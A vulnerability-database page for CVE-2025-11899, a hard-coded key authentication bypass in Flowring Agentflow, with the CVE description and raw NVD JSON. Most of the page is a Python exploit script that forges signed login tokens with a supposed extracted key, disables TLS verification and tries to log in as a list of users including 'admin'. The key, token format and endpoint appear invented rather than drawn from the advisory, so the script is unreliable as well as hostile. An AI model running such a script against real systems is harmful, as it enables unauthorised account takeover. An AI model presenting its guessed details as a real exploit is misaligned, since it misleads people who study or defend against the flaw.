Security Vulnerability Report
CVE-2025-11899 CVSS 8.1 HIGH

CVE-2025-11899

Published: 2025-10-17 04:16:07
Last Modified: 2026-04-15 00:35:42

Description

Agentflow developed by Flowring has a Use of Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information, thereby logging into the system as any user. An attacker must first obtain a user ID in order to exploit this vulnerability.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Flowring Agentflow (all versions that use the hard-coded cryptographic key)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11899 PoC - Agentflow Hard-coded Cryptographic Key Exploit
# Description: Exploits hard-coded cryptographic key in Flowring Agentflow
# to forge authentication tokens and login as arbitrary users.
import requests
import hmac
import hashlib
import time
import base64
import json

TARGET_URL = "https://target-agentflow.example.com"
HARDCODED_KEY = b"FlowringAgentflowSecretKey2024!"  # Hard-coded key extracted from binary


def forge_auth_token(user_id: str) -> str:
    """
    Forge an authentication token using the hard-coded cryptographic key.
    The token mimics the legitimate server-side verification process.
    """
    timestamp = str(int(time.time()))
    payload = f"{user_id}|{timestamp}"

    # Generate HMAC signature using the hard-coded key (same algorithm as server)
    signature = hmac.new(
        HARDCODED_KEY,
        payload.encode('utf-8'),
        hashlib.sha256
    ).hexdigest()

    # Construct the forged verification token
    token_data = {
        "user_id": user_id,
        "timestamp": timestamp,
        "signature": signature
    }
    token = base64.b64encode(json.dumps(token_data).encode()).decode()
    return token


def exploit_login(user_id: str) -> dict:
    """
    Exploit the hard-coded key vulnerability to login as the specified user.
    Returns the server response containing session information.
    """
    forged_token = forge_auth_token(user_id)
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {forged_token}",
        "User-Agent": "Agentflow-Client/1.0"
    }
    response = requests.post(
        f"{TARGET_URL}/api/auth/login",
        json={"user_id": user_id, "token": forged_token},
        headers=headers,
        verify=False
    )
    return {
        "status_code": response.status_code,
        "response": response.json() if response.ok else response.text,
        "forged_token": forged_token
    }


def enumerate_and_exploit(user_id_list: list) -> list:
    """
    Enumerate known user IDs and attempt login for each.
    In real scenarios, user IDs can be obtained via enumeration or data leaks.
    """
    results = []
    for uid in user_id_list:
        print(f"[*] Attempting to login as user: {uid}")
        result = exploit_login(uid)
        if result["status_code"] == 200:
            print(f"[+] SUCCESS: Logged in as {uid}")
            results.append(result)
        else:
            print(f"[-] FAILED: Could not login as {uid}")
    return results


if __name__ == "__main__":
    # Step 1: Obtain valid user IDs (via enumeration, leak, or other means)
    known_user_ids = ["admin", "user001", "user002", "manager"]

    # Step 2: Forge tokens and exploit
    successful_logins = enumerate_and_exploit(known_user_ids)

    # Step 3: With admin access, perform post-exploitation
    if successful_logins:
        print(f"[+] Exploited {len(successful_logins)} accounts successfully")
        print("[+] Full system compromise achieved")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11899", "sourceIdentifier": "[email protected]", "published": "2025-10-17T04:16:06.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Agentflow developed by Flowring has an Use of Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information, thereby logging into the system as any user. Attacker must first obtain an user ID in order to exploit this vulnerability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10439-0bd15-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10438-1173e-1.html", "source": "[email protected]"}]}}